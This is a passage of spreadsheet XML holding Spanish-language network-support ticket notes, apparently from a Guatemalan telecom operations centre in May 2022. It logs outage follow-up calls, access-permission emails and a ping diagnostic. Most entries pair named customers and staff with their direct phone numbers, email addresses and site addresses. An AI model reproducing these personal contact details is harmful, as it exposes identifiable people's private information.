ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCGMD0007M-P ::: IMGMD005067 ::: LINK DOWN</t>
  </si>
  <si>
    <t>F4568062</t>
  </si>
  <si>
    <t>CORREO ENVIADO A CLIENTE INFORMADO SOBRE INCIDENTE
DE: MONICA ESTEFANIA BETSABE MARROQUIN SHUTUC
ENVIADO: JUEVES, 19 DE MAYO DE 2022 13:56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2016 CAIDA DE SERVICIO
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM12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MASIVA: F4550569
TICKET: F4568062
ID: 47501784T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM2016
UBICADO EN: CAJERO 2016 SUPER 24 LAS BRISAS, KM.16.5 CR SAN JUAN SACT. INTERIOR GASOLINERA SHELL COL. MIXCO NORT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WILLIAM RAMIREZ QUIEN INDICA QUE ES NECESARIO ENVIAR CORREO Y SOLICITAR VISITA DE SUPERVISOR
3001888473
COLA:
NOMBRE: A: 24207210
NÚMERO: 24207210
DURACIÓN: 0:06:18
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207210
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 19/05/2022 13:23:39</t>
  </si>
  <si>
    <t>F4568066</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE DAVID SIC, PARA QUE APOYARA REINCIANDO LA PBX PERO YA NO CONTESTA.
3001283217, 3001284257,3001286178
COLA:
NOMBRE: A: 56956052
NÚMERO: 56956052
DURACIÓN: 0:00:01
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 56956052
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 18/05/2022 18:20:12
COLA:
NOMBRE: A: 56956052
NÚMERO: 56956052
DURACIÓN: 0:00:14
ESTADO: MARCANDO
DETALLES: 56956052
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 18/05/2022 18:18:57</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JOSE LOSI 57147918 MENCIONA QUE YA TODO ESTA FUNCIONANDO DE MANERA CORRECTA
-ID 3001675643</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CINTHIA JIMENEZ 53069593 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO DE LA PERSONA  QUE SE ENCUENTRA EN PR JOSE LOSI 57147918
-ID 3001667069</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAVID SIC 56956052 MENCIONA QUE SE VALIDE CON PR CINTHIA JIMENEZ 53069593
-ID 3001663281</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE.
DE: HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 18:23
PARA: TELEFONIACORPT@BI.COM.GT &lt;TELEFONIACORPT@BI.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SD1126928 BANCO INDUSTRIAL KM 22.4 CARRETERA CA-9, GDN 66709100
BUENAS TARDES,
ESTIMADOS POR ESTE MEDIO SE LES SOLICITA DE SU APOYO REINICIANDO LA PBX DE ESTA LINEA.
YA QUE NO SE OBSERVA CONEXIÓN POR ESTE MOTIVO NO HAY LLAMADAS EN LA AGENCIA.
QUEDO A LA ESPERA DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4568081</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA NUEVAMENTE AL PR A NATAEL DIVAS 30104094 ID: 3001657449 SE LE SOLICITA REALIZAR PRUBAS CON EL ENLACE E INDICA QUE SI LO TIENEN CAÍDO, SE CONTACTA A GESTOR DARWINH.ESPANA ID: 3001661721 NO RESPONDE, SE CONTACTA AL CNOC ID: 3001662800 ATIENDE WAGNER POLANCO SE LE SOLICITA APOYO Y SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/*/</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A OSCAR ESTRADA/CLIENTE; SE LE INFORMA QUE SE HARÁN PRUEBAS CON PR; SE LLAMÓ/HABLÓ CON NATANAEL RIVAS/PR 30104094 INDICA QUE LLEGÓ TÉCNICO CLARO PERO SE RETIRÓ; PR SE RETIRA, MAÑANA INICIAN LABORES A PARTIR DE LAS 07:00AM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  NATAEL DIVAS 30104094 INDICA QUE YA ESTA EL TECNICO EN EL SITIO TRABAJANDO**
ID 3001502166
**</t>
  </si>
  <si>
    <t>F4568082</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDGAR CONTRERAS 47690934  MENCIONA QUE PERSISTE EL INCONVENIENTE CON EL EQUIPO MERAKI
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001527005</t>
  </si>
  <si>
    <t>###SE LLAMA AL CLIENTE EDGAR CONTRERAS INDICA QUE LE PARECE  BIEN DEJARLO PARA MAÑANA A LAS 8 AM##
1001001646
COLA:
NOMBRE: A: 47690934
NÚMERO: 47690934
DURACIÓN: 0:01:41
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 47690934
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 19/05/2022 16:02:24</t>
  </si>
  <si>
    <t>SEGÚN CRONOLOGÍA DE LA FALLA NO HAY NADA PENDIENTE POR PARTE DEL CLIENTE SE PASA A WIP SE PIDE APOYO DEL CNOC CON EL GESTOR DARWINH.ESPANA EL SEGUIMIENTO Y CAMBIO DE ESTADO VIA SKYPE.</t>
  </si>
  <si>
    <t>F4568087</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JENSSY VELASQUEZ AL 504 2280-4000 CONTESTA UN SEÑOR PERO NO SE LE ESCUCHA MUY BIEN , SE INTENTARA LUEGO **
ID 3001436865
**</t>
  </si>
  <si>
    <t>F4568096</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE, JENNY, QUIEN INDICA QUE LA VELOCIDAD DEBE SER 70MBPS Y ES LO QUE HA ESTADO PAGANDO, SEGUN DOCUMENTACION SE OBSERVA QUE SON 50MPBS POR LO QUE SE VALIDARA LA INFORMACION OBTENIDA POR EL CLIENTE, PROPORCIONA CONTACTO DE EJECUTIVO DE CUENTA VANESSA HERNANDEZ 33320000.
NÚMERO: 22056099
FIN: HOY, 11:03
ID DE LLAMADA: 3001679203</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JENNIE QUIROZ AL 32174814  NO ATIENDE LLAMADA YA QUE INDICA QUE LE LLAMO PERSONAL DE CLARO A LA OTRA LINEA **
ID 3001669846
**</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE JENNIE QUIROZ, QUIEN MENCIONA QUE TAMBIEN POR SU LADO HA NOTIFICADO A ELA POR MEDIO DE LLAMADA Y LE HA REENVIADO EL CORREO DONDE REALIZO EL REPORTE, POR LO QUE SE PROCEDE AL CIERRE DE CASO YA QUE SE DARA SEGUIMIENTO A CLIENTE POR COMERCIAL.
3001767504
COLA:
NOMBRE: A: 0050432174814
NÚMERO: 0050432174814
DURACIÓN: 0:01:28
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050432174814
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 19/05/2022 11:56:37</t>
  </si>
  <si>
    <t>F4568153</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JOSE CHACON AL 54329322 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
AUTORIZA CIERRE DE TICKET
ID 3001661445
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE CHACON AL 54329322   CLIENTE NO RESPONDE,  ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001508026
**</t>
  </si>
  <si>
    <t>F4568907</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA. CONTESTA EL CLIENTE NELSON QUIEN INDICA QUE YA POSEE LLAMADAS.
3001426968
COLA:
NOMBRE: A: 0050322313600
NÚMERO: 0050322313600
DURACIÓN: 0:00:19
ESTADO: CONECTADA
DETALLES: 0050322313600
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 18/05/2022 20:27:51</t>
  </si>
  <si>
    <t>F4569086</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA LA SEÑORITA LAURA RODRIGUEZ QUIEN INDICA QUE DE SU LADO YA FUE CERRADO EL TICKET QUE FUE FALLA DE ENERGIA . AUTORIZA CIERRE DE TICKET **
ID 3001438434
**</t>
  </si>
  <si>
    <t>F4569119</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL JOSÉ GOMÉ AL 2521-4424 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001438899
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL JOSÉ GOMÉZ AL 2521-4424  CONTESTA EL SEÑOR RAFAEL GIRON CONFIRMA SERVICIO ESTABLE Y OPERATIVO. AUTORIZA CIERRE DE TICKET  **
ID 3001509097
**</t>
  </si>
  <si>
    <t>F4569126</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL JOSÉ GOMÉZ AL 2521-4424  CONTESTA EL SEÑOR RAFAEL GIRON INDICA QUE HAY PROBLEMA DE ENERGIA EN SITIO SOLICITA QUE SE QUEDE PENDIENTE EL TICKET AUN **
ID 3001509097
**</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE  RAFAEL GIRON EN LINEA VALIDADANDO
1001019363
COLA:
NOMBRE: A: 0050325214424
NÚMERO: 0050325214424
DURACIÓN: 0:01:37
ESTADO: CONECTADA
DETALLES: 0050325214424
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 19/05/2022 16:57:04</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE RAFAEL GIRON, INDICA QUE SE LE APOYE EN VALIDAR TIEMPOS YA QUE SE ENCUENTRAN ALTOS, SE PROCEDE A REALIZAR DESCARTES.
1001019363
COLA:
NOMBRE: A: 0050325214424
NÚMERO: 0050325214424
DURACIÓN: 0:08:28
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050325214424
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 19/05/2022 17:05:52</t>
  </si>
  <si>
    <t>ENLACE LEVANTADO A NIVEL WAN SIN PERDIDAS
&lt;TSANSVZ3N1D1EID1&gt;PING -C 500 -S 1500 -B -M 30 -VPN BA_VPN 10.138.62.2
  PING 10.138.62.2: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.138.62.2 PING STATISTICS ---
    500 PACKET(S) TRANSMITTED
    500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 15/31/497 MS
&lt;TSANSVZ3N1D1EID1&gt;</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE, INDICA QUE SU NOMBRE NO ES JOSE GOMEZ SINO RAFAEL GIRON, MENCIONA QUE EN ESTE MOMENTO SE ESTAN REALIZANDO DESCARTES DE PRIMER NIVEL Y QUE SE LE LLAME NUEVAMENTE A PARTIR DE LAS 15:30 HORAS PARA VALIDAR ESTADO DE EQUIPOS.
NÚMERO: 0050325214424
FIN: HOY, 13:25
ID DE LLAMADA: 3001893600</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE JOSE GOMEZ, INDICA QUE HAY PERSONAL EN CAMINO A VALIDAR SI ES PROBLEMA DE ENERGIA, PERO QUE SE LE LLAME A LAS 11:30 HORAS PARA VER SI YA LLEGARON AL PUNTO REMOTO.
3001575048
COLA:
NOMBRE: A: 0050325214424
NÚMERO: 0050325214424
DURACIÓN: 0:03:31
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050325214424
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 19/05/2022 10:01:56</t>
  </si>
  <si>
    <t>F4569134</t>
  </si>
  <si>
    <t>**SE  LLAMA A CLIENTE  WALTER AROCHE AL 30727797 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001658404
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A CENTRAL 30727797 PARA CONSULTAR COMPORTAMIENTO DEL SERVICIO, NO CONTESTA; TIEMPO DE MONITOREO HA FINALIZADO, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE.
SE DEBE VALIDAR CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>*/*/*/*/SEGÚN CRONOLOGIA DEL 19/05/2022 12:00:38 CLIENTE SOLICITO MONITOREO DEL SERVICIO HASTA LAS 20:00HRS POR LO QUE SE CITA A GESTOR LUVY.SANDOVAL POR SKYPE PARA QUE PROCEDA A MOVER A ETAPA CORRECTA*/*/*/*/</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARLON NAVAS AL 30727797 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001530610
**</t>
  </si>
  <si>
    <t>**SE  LLAMA A CLIENTE  WALTER AROCHE AL 30727797 INDICA QUE EL SERVICIO ESTA ESTABLE Y OPERATIVO PERO SOLICITA QUE SE DEJE EN OBSERVACION PARA LAS 20:00 HRS**
ID 3001771204
**</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE AL 30727797 RESPONDE WALTER AROCHE, INDICA QUE LE ESPERE UN MOMENTO EN LINEA PERO SE QUEDA EN ESPERA, SE INTENTARA LUEGO
3001595773
COLA:
NOMBRE: A: 30727797
NÚMERO: 011 50230727797
DURACIÓN: 0:00:57
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50230727797
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 19/05/2022 10:13:32</t>
  </si>
  <si>
    <t>F4569150</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL PARA VALIADR ---***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 19 DE MAYO DE 2022 03:43
PARA: CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; AGUILAR MENDOZA EMILIO &lt;EAMENDOZ@UNINET.COM.MX&gt;; RUIZ GARCÍA KARINA &lt;KRUIZ@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 4690063::: TICKET CNOC IMBBL003940::: "FUERA DE SERVICIO"
ESTIMADO SR. CARRILLO.
                DE NUESTRO LADO NO SE REALIZÓ ACCIÓN CORRECTIVA Y NO SE OBSERVAN EVENTOS EN NUESTRA RED.
ADJUNTO MAIL DE SEGUIMIENTO DONDE SE SOLICITABAN CONTACTOS EN SITIO PARA PRUEBAS CON EQUIPOS, ES PROBABLE QUE SE PRESENTARA FALLA DE ENERGÍA EN EL PUNTO REMOTO.
PODRÍA INDICARNOS SI EN BASE AL FUNCIONAMIENTO ACTUAL PODRÍAMOS CERRAR NUESTRO TICKET.
SALUDOS.
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: JUEVES, 19 DE MAYO DE 2022 03:36
PARA: RUIZ GARCÍA KARINA &lt;KRUIZ@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; AGUILAR MENDOZA EMILIO &lt;EAMENDOZ@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 4690063::: TICKET CNOC IMBBL003940::: "FUERA DE SERVICIO"
BUEN DIA TEAM
NOS COMPARTEN ACTUALIZACIÓN DEL CASO, VEMOS EL SERVICIO ACTIVO DESDE HACE MAS DE 5 HORAS, POR FAVOR COMPARTAN EL RFO.
QUEDAMOS AL PENDIENTE.
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>F4569167</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE TURNO AL 78594207 CONTESTA EL SEÑOR DANIEL CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001439556
**</t>
  </si>
  <si>
    <t>F4569170</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK MADRID AL 76828880 INDICA QUE QUIERE SABER QUE FUE LO QUE PASO PORQUE LA AFECTACION Y SOLICITA QUE SE LE ENVIE POR CORREO LA INFORMACION || SE NOTIFICA  A GESTOR**
3001466690 - 3001476768
**</t>
  </si>
  <si>
    <t>F4569227</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAUL ESTEFANO MURILLO GRANIELLO AL 24217006 - 70550036 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001441684 - 3001441885
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAUL ESTEFANO MURILLO GRANIELLO AL 0050370550036  INDICA QUE NO TIENE WIFI Y QUE LA RED LAN TIENE PROBLEMA SE EL EXPLICA QUE ES PROBLEMA INTERNO PERO CL SOLICITA QUE SE LE AYUDE A REVISAR PORQUE MOTIVO NO TIENE WIFI || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
ID 3001776160
**</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE RAUL MURILLO GRANIELLO 70550036 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA  LLAMADA PARA LAS 17:00 HRS
-ID 1001161619</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 70550036 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001736909</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAUL ESTEFANO MURILLO GRANIELLO AL 24217006 - 0050370550036 NO RESPONDE EN EL PRIMER NUMERO Y EL SEGUNDO INDICA QUE AUN NO ESTA EN EL SITIO SOLICITA QUE SE LE LLAME EN 30 MIN **
ID 3001642391- 3001644170
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAUL ESTEFANO MURILLO GRANIELLO AL 24217006 - 70550036 NO RESPONDE EN EL PRIMER NUMERO Y EL SEGUNDO ENVIA A BUZON , SE INTENTARA LUEGO **
ID 3001489600 - 3001490734
**</t>
  </si>
  <si>
    <t>F4569270</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE CESAR HERNANDEZ AL 49341436 CONTESTA EL SEÑOR JOSE VARGAS INDICA QUJE EL SEÑPOR CESAR NO SE ENCUENTRA QUE SE LE LLAME EN 20 MIN NUEVAMENTE **
ID 3001442213
**</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE CESAR HERNANDEZ AL 49341436 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001485456
**</t>
  </si>
  <si>
    <t>F4569572</t>
  </si>
  <si>
    <t>SE REALIZA LLAMADA CON CLIENTE WALTER REYES NÚMERO 45787911, A QUIEN SE LE COMENTA QUE SE ESTA INTENTANDO INSTALAR UN EQUIPO DE MANERA PROVICIONAL PARA PODER RESTABLECER EL SERVICIO YA QUE PERSONAL DE FO SE ENCUENTRA TRABAJANDO EN OTRO SITIO Y ESTIMAN PODER LLEGAR A SITIO Y RESOLVER EL PROBLEMA DENTRO DE  4 HORAS.
CLIENTE CONFIRMA DE ENTERADO Y DA EL VISTO BUENO PARA QUE SE PUEDA INSTALAR EL EQUIPO DE MANERA PROVICIONAL.
RESULTADO: LLAMADA HECHA
NOMBRE: 45787911
NÚMERO: 45787911
INICIO: HOY, 12:44
FIN: HOY, 12:47
DURACIÓN: 3:01
ID DE LLAMADA: 3001847417</t>
  </si>
  <si>
    <t>F4569640</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANGELA NUÑEZ 38290520    QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001442060</t>
  </si>
  <si>
    <t>F4569643</t>
  </si>
  <si>
    <t>23/05/2022 18:28:51 GUATEMALA/CENTRO AMERICA (OMAR ALBERTO OCHOA HID):
SE ENVÍA CORREO A CLIENTE SOLICITANDO ACCESOS PARA PERSONAL TECNICO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MENCIONA QUE TODO ESTA FUNCIONANDO DE MANERA CORRECTA
-ID 1001889108</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE AUTORIZANDO LOS PERMISOS
DE: SERGIO DAVID PINEDA &lt;SSICAL@ITSINFOCOM.COM&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 8:15
PARA: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: CC_BANCO_AZTECA_GT_CHIQUIMULLLA_Z3
BUEN DÍA:
YA ESTÁN AUTORIZADOS LOS PERMISOS PARA LA VISITA.
SALUDOS
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MENCIONA QUE YA ESTAN AUTORIZADOS LOS PERMISOS
-ID 1001813071</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MENCIONA QUE NO SE ENCUENTRA EN SU OFICINA POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 1001805980 - 1001806021</t>
  </si>
  <si>
    <t>F4569653</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE 	WILLIAM MAZARIEGOS 77713389 56250747 PARA REALIZAR PRUEBAS
##LALMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO CTC EL CUAL INDICA LINK 1 Y 2 - APAGADO PWR -  VERDE, CLIENTE NOS APOYA CON EL REINICIO DE EQUIPO PERO EL SERVICIO NO RESTABLECE, CLIENTE INDICA QUE EL DIA DE HOY AMANECIO UNOS CABLES REVENTADOS EN LA PARTE DE ENFRENTE DE LAS INSTALACIONES POSIBLEMENTE HUBO UN ACCIDENTE EN LA NOCHE  Y PASO REVENDANTO EL CABLE, SE PROCEDE A COORDINAR PERSONAL TECNICO PARA LA REVISION DEL SERVICIO CLIENTE INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS PARA EL INGRESO A LAS INSTALACIONES
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM MAZARIEGOS 77713389 RESPONDE MARIELENA QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVIIO
-ID 3001625060</t>
  </si>
  <si>
    <t>CLIENTE NOS CUELGA, PERO SE DEVUELVE LA LLAMADA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4569654</t>
  </si>
  <si>
    <t>SE  LLAMA AL CLIENTE KATERIN VILLEDA 76049788  EN DOS OCASIONES DESDE VI-VO NO RESPONDE, SE NECESITA CONTACTAR AL CLIENTE PARA REALIZAR PRUEBAS. LLAMADAS DESDE VI-VO</t>
  </si>
  <si>
    <t>SE LLAMA A KATERIN VILLEDA 22716030 EXT 127, ATIENDE DOUGLAR GARCIA COMENTA QUE REINICIARON EQUIPOS EN SITIO Y EL E1 RESTABLECIÓ. AUTORIZA EL CIERRE DEL CASO. ID:3001809677
PORT STATUS                                	= NORMAL
DEVICE NAME                                	= M03_SSSASVCE_E1_CENTRO_03
NAME                                       	= FRAME:0/SLOT:0/PORT:12
ALIAS                                      	= INDUS_IMPRE_UNION S_A_DE C_V
LOOPBACK STATUS                            	= NO
SIGNALING MODE                             	= CCS
CRC4 FRAME VERIFY SWITCH                   	= DISABLE
LINE CODE MODE                             	= HDB3
IMPEDANCE                                  	= 75¿
WORKING MODE FOR DIGITAL SECTION ACCESS    	= DIGITAL SECTION ACCESS
L2 MONITORING SWITCH                       	= ON</t>
  </si>
  <si>
    <t>SE LLAMA A KATERINE VILLEDA 76049788, 3001444106, CLIENTE INDICA QUE NO TIENE LLAMADAS EXTERNAS SOLO INTERNAS, SE DIRIGE A DONDE ESTÁN LOS EQUIPOS, SOLICITA SE LE LLAME EN 10 MINUTOS.</t>
  </si>
  <si>
    <t>F4569657</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO //  QUEDAMOS ATENTOS A SUS COMENTARIOS
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 19 DE MAYO DE 2022 10:00
PARA: WNAVARRO@GTA.COM.GT &lt;WNAVARRO@GTA.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 361700008T | GRUPO DE TIENDAS ASOCIADOS, SOCIEDAD ANONIMA
BUEN DÍA ESTIMADO CLIENTE , UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA NUESTRO PERSONAL TÉCNICO QUE SE PRESENTARA EN EL SITIO.
DIRECCIÓN:  12 CALLE 12-16 COLONIA ROOSEVELTH ZONA 11.
ADJUNTAMOS LOS DATOS DE LOS TÉCNICO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QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES
ATT</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 45276846 PARA SEGUIMIENTO, NO CONTESTA; NO SE HA TENIDO RESPUESTA AL CORREO QUE SE LE ENVIÓ PARA TRAMITAR LOS PERMISOS A PERSONAL TÉCNICO QUE ATENDERÁ. SE LE HACE RECORDATORIO DE NUEVO POR LA MISMA VÍA.</t>
  </si>
  <si>
    <t>F4569660</t>
  </si>
  <si>
    <t>CLIENTE COMENTA QUE YA REINICIARON LOS EQUIPOS Y VALIDARON QUE EL OP 108 SI SE ENCUENTRA ALARMADO, INDICA QUE COMUNMENTE HAN TENIDO PROBLEMAS CON LA FO, POR LO QUE  CLIENTE SOLICITA QUE SE ENVIE PERSONAL TECNICO PARA REVISAR LA MISMA, INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS PARA EL INGRESO UNICAMENTE QUE LLEGEN IDENTIFICADOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE LUIS BARRIOS 33268927
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4569673</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO ROSAS  AL 55312227 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001542478
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO ROSAS AL 55312227  CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
ID 3001804973
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO ROSAS AL 55312227  NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001706101
**</t>
